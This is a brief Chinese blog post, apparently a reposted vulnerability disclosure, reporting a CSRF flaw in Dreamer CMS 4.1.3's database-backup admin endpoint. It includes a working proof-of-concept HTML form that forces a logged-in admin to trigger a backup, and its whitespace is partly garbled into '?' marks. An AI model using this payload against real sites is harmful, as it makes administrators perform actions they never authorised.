梦想家内容管理系统（Dreamer CMS）跨站请求伪造漏洞

2024-01-07 18:46:44

目标:GitHub - iteachyou-wjn/dreamer_cms: Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建，支持静态化、标签化建站。不需要专业的后台开发技能，会HTML就能建站，上手超简单；只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段，真正实现“0”代码建网站。

版本：4.1.3

通过组件/admin/database/backup发现包含跨站点请求伪造（CSRF）

创建poc

<html> ? ?<body> ?<script>history.pushState('', '', '/')</script> ? ?<form action="http://192.168.247.186:8888/admin/database/backup"> ? ? ?<input type="hidden" name="tableName" value="system_adverts" /> ? ? ?<input type="submit" value="Submit request" /> ? ?</form> ?</body> </html>

成功

本文链接：? https://www.黑客.wang/wen/22.html

文章来源:https://blog.csdn.net/qq_36759934/article/details/135434746
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系我的编程经验分享网邮箱：veading@qq.com进行投诉反馈，一经查实，立即删除！